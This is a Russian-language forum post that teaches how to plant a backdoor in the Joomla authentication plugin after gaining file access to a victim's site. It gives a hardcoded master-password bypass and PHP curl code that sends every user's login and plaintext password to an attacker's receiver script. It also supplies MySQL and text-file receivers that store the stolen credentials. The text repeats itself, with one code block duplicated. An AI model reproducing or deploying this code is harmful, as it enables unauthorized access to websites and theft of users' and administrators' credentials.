Удалённый пользователь 67689
Guest
У
Удалённый пользователь 67689
Guest
Всем привет, дорогие читатели! В сегодняшнем уроке
я расскажу как взломать пароль Joomla (любой версии) имея доступ к файловой системе.
Для того, чтобы взломать пароль Joomla нам понадобиться:
, если папка существует, значит у нас версия 2.5 или 3, но если папки нет, то версия 1.5. Для тех, кто не понял: тильда ~ означает корень папки Joomla.
Теперь из нашей текущей точки входа в систему нужно выполнить одно действие (если у вас есть доступ к файл менеджеру, этого делать не нужно):
Установим замечательный файл менеджер, который подойдет для этой задачи (взлома пароля Joomla) на все 100%. Скачаем PHP File Manager (просто и понятно :)). Он довольно простой и главное легкий (один файл весом в 230кб).
Теперь все зависит от вашего метода “проникновения” в систему. Надеюсь сами справитесь :)
Итак, у нас есть файл менеджер. Теперь придется разделиться. У кого версия 2.5 или 3 читает дальше.
У кого 1.5 листает ниже.
ВЗЛОМАТЬ ПАРОЛЬ JOOMLA 2.5 И 3
Итак, у Вас версия 2.5 или 3, есть доступ к файл менеджеру и прямые руки. Продолжим насилие:
Откроем файл
и перейдем на строку 59.
Взломать пароль Joomla - Joomla.php
Если вам просто нужно войти через чей то аккаунт, то заменяем строку 59 полностью:
Теперь вместо пароля, Вам нужно просто “вежливо” попросить Joomla, и она сделает всю работу за Вас!
Взломать пароль Joomla - auth-me-please
А теперь рассмотрим другой вариант. Таким образом мы сможем получить расшифрованный пароль администратора (и не только).
В том же файле до линии 69 вставляем:
Меняем _ПУТЬ К_ на адрес вашей папки с файлом receiver.php (о нем расскажу чуть позже) и делаем пометку для домена вместо _ПОМЕТКА_.
Что делает скрипт? При удачном входе в систему отправляет на наш сервер логин и пароль “жертвы”.
Теперь можно сделать такой скрипт и для старой версии…
ВЗЛОМАТЬ ПАРОЛЬ JOOMLA 1.5
Откроем файл ~/plugins/authentication/joomla.php и перейдем на строку 55.
Файл внешне похож на новую версию, а вот действия вовсе не отличаются.
Меняем 88 строку:
И вставляем перед 98:
<?php
if ($curl = curl_init()) {
curl_setopt($curl, CURLOPT_URL, 'http://_ПУТЬ К_/receiver.php');
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, "login=" . implode("&pass=", $credentials) . "&domain=_ПОМЕТКА_");
$out = curl_exec($curl);
curl_close($curl);
}
Готово!
СЕРВЕРНАЯ ЧАСТЬ
Теперь дело осталось за малым, написать приемник наших логинов и паролей. На хостинге создадим файл receiver.php. Если есть MySQL, то вставляем (не забудьте изменить логин, пароль и базу):
<?php
if ($_POST["login"] && $_POST["pass"]) {
$db = @mysql_connect("localhost", "_ЛОГИН БД_", "_ПАРОЛЬ БД_");
@mysql_select_db("_НАЗВАНИЕ БД_", $db);
$sql = 'INSERT INTO credentials(username, password, domain)
VALUES("' . $_POST["login"] . '","' . $_POST["pass"] . '","' . $_POST["domain"] . '")';
@mysql_query($sql);
}
else {
header("Location: http://_ПУТЬ К_/reсeiver.php");
}
Вангую: спросите зачем header(); с тем же именем файла? Отвечу: вместо английской c русская с. Защита от админо-идиотов.
СЕРВЕРНАЯ ЧАСТЬ БЕЗ MYSQL
Если у кого то нет MySQL, то этот раздел специально для таких людей.
Создаем файл receiver.php и вставляем в него код:
<?php
$filename = "joomla.txt";
if (is_writable($filename) && $_POST["login"] && $_POST["pass"]) {
if (!$handle = fopen($filename, "a")) {
header("Location: http://_ПУТЬ К_/reсeiver.php");
exit();
}
if (fwrite($handle, $_POST["login"] . ":" . $_POST["pass"] . ":" . $_POST["domain"] . "\n") === FALSE) {
header("Location: http://_ПУТЬ К_/reсeiver.php");
exit();
}
fclose($handle);
exit();
}
else {
header("Location: http://_ПУТЬ К_/reсeiver.php");
exit();
}
Готово! Теперь можно хвастаться всем подряд, и ломать чужие сайты :)
Версия для тех, кто не любит быдлокод или слишком ленив
[VIRTOT]https://www.virustotal.com/ru/file/1308e8fa6abda5c7e6f6dc9c99bf1544e02ee88e391da4f967fad2e14d0c4677/analysis/1526075182/[/VIRTOT]
я расскажу как взломать пароль Joomla (любой версии) имея доступ к файловой системе.
Для того, чтобы взломать пароль Joomla нам понадобиться:
- Прямые руки (две штуки) :)
- Доступ к файловой системе “жертвы”Подойдет шелл…
- …или cross scripting…
- …или даже доступ к любому плагину для работы с файлами в Joomla! “жертвы”
- Любой хостинг с php (обязательно) и mysql (опционально) доступный из внешки
~/plugins/authentication/joomla/
, если папка существует, значит у нас версия 2.5 или 3, но если папки нет, то версия 1.5. Для тех, кто не понял: тильда ~ означает корень папки Joomla.
Теперь из нашей текущей точки входа в систему нужно выполнить одно действие (если у вас есть доступ к файл менеджеру, этого делать не нужно):
Установим замечательный файл менеджер, который подойдет для этой задачи (взлома пароля Joomla) на все 100%. Скачаем PHP File Manager (просто и понятно :)). Он довольно простой и главное легкий (один файл весом в 230кб).
Теперь все зависит от вашего метода “проникновения” в систему. Надеюсь сами справитесь :)
Итак, у нас есть файл менеджер. Теперь придется разделиться. У кого версия 2.5 или 3 читает дальше.
У кого 1.5 листает ниже.
ВЗЛОМАТЬ ПАРОЛЬ JOOMLA 2.5 И 3
Итак, у Вас версия 2.5 или 3, есть доступ к файл менеджеру и прямые руки. Продолжим насилие:
Откроем файл
~/plugins/authentication/joomla/joomla.php
и перейдем на строку 59.
Взломать пароль Joomla - Joomla.php
Если вам просто нужно войти через чей то аккаунт, то заменяем строку 59 полностью:
if ($crypt == $testcrypt || $credentials['password'] == 'auth-me-please') {
Теперь вместо пароля, Вам нужно просто “вежливо” попросить Joomla, и она сделает всю работу за Вас!
Взломать пароль Joomla - auth-me-please
А теперь рассмотрим другой вариант. Таким образом мы сможем получить расшифрованный пароль администратора (и не только).
В том же файле до линии 69 вставляем:
<?php
if ($curl = curl_init()) {
curl_setopt($curl, CURLOPT_URL, 'http://_ПУТЬ К_/receiver.php');
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, "login=" . implode("&pass=", $credentials) . "&domain=_ПОМЕТКА_");
$out = curl_exec($curl);
curl_close($curl);
}
if ($curl = curl_init()) {
curl_setopt($curl, CURLOPT_URL, 'http://_ПУТЬ К_/receiver.php');
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, "login=" . implode("&pass=", $credentials) . "&domain=_ПОМЕТКА_");
$out = curl_exec($curl);
curl_close($curl);
}
Меняем _ПУТЬ К_ на адрес вашей папки с файлом receiver.php (о нем расскажу чуть позже) и делаем пометку для домена вместо _ПОМЕТКА_.
Что делает скрипт? При удачном входе в систему отправляет на наш сервер логин и пароль “жертвы”.
Теперь можно сделать такой скрипт и для старой версии…
ВЗЛОМАТЬ ПАРОЛЬ JOOMLA 1.5
Откроем файл ~/plugins/authentication/joomla.php и перейдем на строку 55.
Файл внешне похож на новую версию, а вот действия вовсе не отличаются.
Меняем 88 строку:
if ($crypt == $testcrypt || $credentials['password'] == 'auth-me-please') {
И вставляем перед 98:
<?php
if ($curl = curl_init()) {
curl_setopt($curl, CURLOPT_URL, 'http://_ПУТЬ К_/receiver.php');
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, "login=" . implode("&pass=", $credentials) . "&domain=_ПОМЕТКА_");
$out = curl_exec($curl);
curl_close($curl);
}
Готово!
СЕРВЕРНАЯ ЧАСТЬ
Теперь дело осталось за малым, написать приемник наших логинов и паролей. На хостинге создадим файл receiver.php. Если есть MySQL, то вставляем (не забудьте изменить логин, пароль и базу):
<?php
if ($_POST["login"] && $_POST["pass"]) {
$db = @mysql_connect("localhost", "_ЛОГИН БД_", "_ПАРОЛЬ БД_");
@mysql_select_db("_НАЗВАНИЕ БД_", $db);
$sql = 'INSERT INTO credentials(username, password, domain)
VALUES("' . $_POST["login"] . '","' . $_POST["pass"] . '","' . $_POST["domain"] . '")';
@mysql_query($sql);
}
else {
header("Location: http://_ПУТЬ К_/reсeiver.php");
}
Вангую: спросите зачем header(); с тем же именем файла? Отвечу: вместо английской c русская с. Защита от админо-идиотов.
СЕРВЕРНАЯ ЧАСТЬ БЕЗ MYSQL
Если у кого то нет MySQL, то этот раздел специально для таких людей.
Создаем файл receiver.php и вставляем в него код:
<?php
$filename = "joomla.txt";
if (is_writable($filename) && $_POST["login"] && $_POST["pass"]) {
if (!$handle = fopen($filename, "a")) {
header("Location: http://_ПУТЬ К_/reсeiver.php");
exit();
}
if (fwrite($handle, $_POST["login"] . ":" . $_POST["pass"] . ":" . $_POST["domain"] . "\n") === FALSE) {
header("Location: http://_ПУТЬ К_/reсeiver.php");
exit();
}
fclose($handle);
exit();
}
else {
header("Location: http://_ПУТЬ К_/reсeiver.php");
exit();
}
Готово! Теперь можно хвастаться всем подряд, и ломать чужие сайты :)
Версия для тех, кто не любит быдлокод или слишком ленив
[VIRTOT]https://www.virustotal.com/ru/file/1308e8fa6abda5c7e6f6dc9c99bf1544e02ee88e391da4f967fad2e14d0c4677/analysis/1526075182/[/VIRTOT]
